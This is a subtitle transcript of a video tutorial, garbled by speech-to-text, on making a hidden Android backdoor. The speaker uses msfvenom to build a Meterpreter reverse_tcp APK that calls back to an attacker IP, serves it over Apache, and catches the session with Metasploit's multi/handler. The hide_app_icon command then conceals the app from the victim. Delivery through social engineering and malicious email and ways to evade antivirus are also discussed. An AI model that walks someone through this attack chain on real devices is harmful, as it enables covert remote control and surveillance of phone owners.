Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated:
1
00:00:15,360 --> 00:00:18,540
Hi and welcome back to our members only exclusive video.
2
00:00:19,170 --> 00:00:23,910
So today we're discussing about very simple trick on how you could actually hide the mobile application,
3
00:00:23,910 --> 00:00:25,290
true matter supply framework.
4
00:00:25,620 --> 00:00:31,620
So we will create a file and once we have created a picture file or install it to a delivery mechanism
5
00:00:31,620 --> 00:00:37,200
from a Web application server into the mobile device, and from there we'll actually issue a command
6
00:00:37,200 --> 00:00:40,650
to actually highlight the mobile app from the user.
7
00:00:40,830 --> 00:00:46,200
And the only way to see that will be to look into the settings of the applications and see what are
8
00:00:46,200 --> 00:00:51,060
some of the running services or running apps that are inside the mobile device.
9
00:00:51,570 --> 00:00:54,640
So without further ado, let us get started on today's tutorial.
10
00:00:55,110 --> 00:00:59,890
So on the left of the screen of colonics running and we can actually go into terminal and once again
11
00:00:59,940 --> 00:01:03,480
terminal, we can zoom in a little and we can enter IP ADR.
12
00:01:04,260 --> 00:01:09,160
So if this we can actually see the IP address of one or two one six eight dot one 11.
13
00:01:09,180 --> 00:01:11,680
So this is the IP address of the attacker server.
14
00:01:11,700 --> 00:01:17,160
So this is also the server where we'll be hosting the listening services coming from Matus blight.
15
00:01:17,850 --> 00:01:21,800
And of course, on the right side of the screen, I actually have an Android mobile device running.
16
00:01:21,810 --> 00:01:25,440
So this is running on the Oracle virtual box.
17
00:01:25,440 --> 00:01:26,640
So this is an android.
18
00:01:26,640 --> 00:01:27,660
It is running over here.
19
00:01:27,660 --> 00:01:33,330
And of course, we were able to surf into the net and we can actually open up browsers and we can actually
20
00:01:33,330 --> 00:01:39,020
go into the Internet and be able to search up on information, say, for example, enter LILIANNA and
21
00:01:39,060 --> 00:01:41,600
we can see the website, a YouTube channel and so on.
22
00:01:41,610 --> 00:01:43,930
So there is Internet connection.
23
00:01:44,760 --> 00:01:51,300
So moving back into colonics, we actually have to use MSN Venom so you can actually enter MSA venom.
24
00:01:51,300 --> 00:01:54,090
Then of course, we would tell you all the parameters and options.
25
00:01:54,570 --> 00:01:59,430
And it's really important, especially when you're learning about cyber security, to try all the tools,
26
00:01:59,430 --> 00:02:04,620
trail all the different parameters and options like the changes in ANOP Slap, for example, over here
27
00:02:04,620 --> 00:02:06,810
that you can see on the length of the slap.
28
00:02:07,170 --> 00:02:11,550
And again, all these are actually being used to help you bypass a lot of these security mechanisms
29
00:02:11,910 --> 00:02:13,970
coming from the antivirus servers and so on.
30
00:02:13,980 --> 00:02:19,170
So really important way for you to really think about cybersecurity in a more advanced level.
31
00:02:19,620 --> 00:02:26,220
And a lot of the advanced level actually requires a lot of trying out tests and aerials, especially
32
00:02:26,220 --> 00:02:30,960
on the fly, trying to find out new ways of bypassing many of these security fences.
33
00:02:31,830 --> 00:02:34,920
So, of course, moving forward, what we'll do is we actually enter terms venom.
34
00:02:35,610 --> 00:02:41,530
And we actually ended up followed by Android Meter Preeta, followed by reverse underscore TCP.
35
00:02:41,550 --> 00:02:46,130
So this would be a reverse shell into the colonics listening server.
36
00:02:46,380 --> 00:02:51,140
And of course we can go into almost equal one or two one six eight one dot 11.
37
00:02:51,150 --> 00:02:57,640
So this is the listening server IP address to be using for mobile port so we can say nine nine nine
38
00:02:57,650 --> 00:03:05,580
nine and of course we can also do a R and we have output to fall into, say, for example, that we
39
00:03:05,580 --> 00:03:11,910
can actually put it in and call a mobile app dot apk and hit enter on that.
40
00:03:11,940 --> 00:03:13,460
So this would generate a fall.
41
00:03:13,470 --> 00:03:18,330
So as you can see on the left side, the file is being generated by mouther venom.
42
00:03:18,340 --> 00:03:23,320
So once you have the file you have to service it and release it over into the mobile application.
43
00:03:23,320 --> 00:03:30,600
And a lot of times a lot of this payloads are actually being really using Web application servers,
44
00:03:30,600 --> 00:03:34,620
using social engineering attacks, using malicious emails and so on.
45
00:03:35,070 --> 00:03:41,370
So a lot of times all this payloads and deliveries are actually used using social engineering to mass
46
00:03:41,370 --> 00:03:43,170
email sending and so on.
47
00:03:43,440 --> 00:03:49,050
So usually that's the case in a lot of the attacks that are happening in the industry and in fact in
48
00:03:49,050 --> 00:03:49,740
the industry.
49
00:03:50,070 --> 00:03:55,410
Most of the time, 99 percent of the time, the attacks are going after vulnerabilities that are really
50
00:03:55,410 --> 00:03:59,910
being available for the past many years instead of the zero day attacks.
51
00:03:59,910 --> 00:04:06,000
And of course, zero day attacks are highly novel, but a generation and a creation of zero day vulnerabilities
52
00:04:06,000 --> 00:04:07,890
and exploits are very challenging.
53
00:04:08,760 --> 00:04:11,110
So anyway, moving forward.
54
00:04:11,160 --> 00:04:14,790
So what we'll do is we can actually go ahead and go into MSF console.
55
00:04:14,800 --> 00:04:16,830
So this was start up to a supply framework.
56
00:04:17,890 --> 00:04:23,680
And once we are in the supply framework, what we'll do is we have to start up the server.
57
00:04:23,680 --> 00:04:28,870
So, of course, once we start up the server, this is the part where we will actually host the listening
58
00:04:28,870 --> 00:04:29,320
server.
59
00:04:29,320 --> 00:04:33,400
And once we hold, the listening server will be able to get ready for any connections coming in.
60
00:04:34,390 --> 00:04:41,200
And what we can do is we can actually enter, use, exploit, multi handler.
61
00:04:42,010 --> 00:04:48,010
So once you do that, all you got to do is move forward and look at show options so you can see what
62
00:04:48,010 --> 00:04:49,300
are the options available.
63
00:04:49,840 --> 00:04:53,350
So you can also specify the kind of payload that we'll be using in this case.
64
00:04:53,350 --> 00:05:01,810
So we can actually go ahead and say that we'll be using the payload so we can enter set payload as Android
65
00:05:01,930 --> 00:05:09,880
meter reader, reverse underscore TCP and we can show options and we have to set the elbow, says one
66
00:05:09,970 --> 00:05:11,740
two one six eight one dot 11.
67
00:05:11,770 --> 00:05:19,090
So this is the Colonics IP address and once you have all this information being set up, you can actually
68
00:05:19,090 --> 00:05:20,150
go and enter exploit.
69
00:05:20,860 --> 00:05:26,260
So this would actually start hosting the server so we can open a terminal again.
70
00:05:27,070 --> 00:05:32,620
So now what we got to do is transfer the file that we've created over here near mobile app ABQ and we
71
00:05:32,620 --> 00:05:35,020
get to transfer it into the mobile application.
72
00:05:35,590 --> 00:05:40,030
So, of course, one of the easiest ways actually stop your own Web application server or you can post
73
00:05:40,030 --> 00:05:43,480
it on like Google Cloud, Microsoft 01 Drive and so on.
74
00:05:43,510 --> 00:05:49,360
So those are other ways of actually sharing those malicious payloads over the Internet.
75
00:05:49,510 --> 00:05:53,770
So these are what hackers are doing right now, because there are a lot of ways that you can actually
76
00:05:53,770 --> 00:05:54,640
do the delivery of it.
77
00:05:55,360 --> 00:06:02,770
So what we do is go into if you see anybody followed by Apache and of course we get Apache to and we
78
00:06:02,770 --> 00:06:06,970
can enter, start, make sure to service it started and of course, would be prompted for the password
79
00:06:07,210 --> 00:06:10,030
of the demonstrators to go ahead and keep that in mind.
80
00:06:10,120 --> 00:06:12,250
So now we have the Web application server running.
81
00:06:12,250 --> 00:06:18,890
We can actually move the fall over so we can enter move mobile app to var html.
82
00:06:19,510 --> 00:06:22,610
So this would actually move the fall, so we got to do so.
83
00:06:22,930 --> 00:06:26,770
So super user or pseudo.
84
00:06:30,070 --> 00:06:34,380
So of course we got to keep the password for the user that is currently login as an administrator.
85
00:06:34,870 --> 00:06:40,870
So this would move the file so we can see the Davoren of the demo enter Shell so we can see that we
86
00:06:40,880 --> 00:06:44,890
got the mobile app apk that's been created and is being hosted.
87
00:06:45,340 --> 00:06:51,760
So with that in mind, can actually go into the we can actually go into the mobile application that
88
00:06:51,760 --> 00:06:52,540
we have over here.
89
00:06:55,030 --> 00:07:00,970
So we've got to go into the link and from the liying, we can actually enter one or two one six eight
90
00:07:01,150 --> 00:07:05,770
one dot 11 followed by mobile app dot apk hit enter.
91
00:07:05,770 --> 00:07:07,300
And that that was started.
92
00:07:07,840 --> 00:07:11,020
And once the dollar completes, we can actually open up the epic file.
93
00:07:11,620 --> 00:07:14,320
And of course over here we have the following.
94
00:07:14,320 --> 00:07:17,160
Download it so we can go ahead and open it up.
95
00:07:17,740 --> 00:07:21,850
So of course a lot of times you can actually disguise and do a lot of changes to the epic file that
96
00:07:21,850 --> 00:07:27,880
we discuss later on on other tutorials, how you can actually and beta payload or you can change some
97
00:07:27,880 --> 00:07:34,420
of the settings and configuration so that it mask its identities, Moscow's intention as part of the
98
00:07:34,420 --> 00:07:36,250
installation into the mobile device.
99
00:07:37,900 --> 00:07:40,510
So once we have all this information, go ahead and click install.
100
00:07:40,810 --> 00:07:46,340
And of course, it was installed the main activity into your mobile application.
101
00:07:46,360 --> 00:07:49,210
So, again, the mobile application can be any Android devices.
102
00:07:49,480 --> 00:07:55,330
And if we have the opportunity, we also discuss about some of the Iaw that we have a vulnerability
103
00:07:55,330 --> 00:07:57,660
on and how we can install all those applications.
104
00:07:57,700 --> 00:07:57,900
I do.
105
00:07:57,910 --> 00:07:59,830
I was so glad I hit open on that.
106
00:08:00,580 --> 00:08:05,950
And of course, once you hit open on that, going back into colonics, we can actually see that we can
107
00:08:05,950 --> 00:08:08,110
go back into the mobile app.
108
00:08:08,620 --> 00:08:11,290
And over here we can see the main activity that's been created.
109
00:08:11,890 --> 00:08:13,270
So we can go in and click on that.
110
00:08:34,100 --> 00:08:40,250
So we said it incorrectly, so we have to set Elbel correctly, so set it this nine nine nine nine hit
111
00:08:40,250 --> 00:08:42,320
enter and that go ahead and exploit.
112
00:08:43,070 --> 00:08:47,510
So we have the immediate predecessor and open up now because it's open up on the mobile application.
113
00:08:48,050 --> 00:08:52,970
So, of course, once we have the information, we can enter this info so we can actually see the computer,
114
00:08:52,970 --> 00:08:54,680
the operating system type and so on.
115
00:08:55,160 --> 00:08:58,220
So one really cool trick is actually to look at main activity.
116
00:08:58,220 --> 00:09:02,990
So over here on the mobile device, we can see main activity and all you got to do is actually enter
117
00:09:02,990 --> 00:09:05,240
height at underscore icon.
118
00:09:05,510 --> 00:09:11,300
And once you do that, the activity would actually try to hide the mobile application from appearing
119
00:09:11,900 --> 00:09:12,980
on your catalog.
120
00:09:13,130 --> 00:09:18,350
So over here, what happens is that when we go back here, we can actually see the mobile app being
121
00:09:18,350 --> 00:09:18,880
hidden.
122
00:09:19,460 --> 00:09:24,500
And what happened is that you can actually go under settings and once you're in settings, you can go
123
00:09:24,500 --> 00:09:30,190
on for applications or apps, and then you will be able to see the apps that are running in your environment.
124
00:09:30,500 --> 00:09:34,540
And of course, if you look at erotic services, we can see main activity being running.
125
00:09:34,940 --> 00:09:39,410
So of course, this is the only way the user could detect that the mobile application is running.
126
00:09:40,010 --> 00:09:45,410
So in subsequent members only tutorial, we'll be looking at how you could actually configure the epic
127
00:09:45,410 --> 00:09:52,280
file, change the app icon, change the title postscripts directly alongside installation of the mobile
128
00:09:52,280 --> 00:09:55,400
application and do a lot of automation on top of that.
129
00:09:55,910 --> 00:09:58,760
So, again, I hope you've learned something valuable in today's tutorial.
130
00:09:58,760 --> 00:10:02,630
If you have any questions, feel free to leave a comment below and I'll try my best to answer any of
131
00:10:02,630 --> 00:10:03,260
those questions.
132
00:10:03,440 --> 00:10:05,090
And thank you so much once again for watching.
15030
Can't find what you're looking for?
Get subtitles in any language from opensubtitles.com, and translate them here.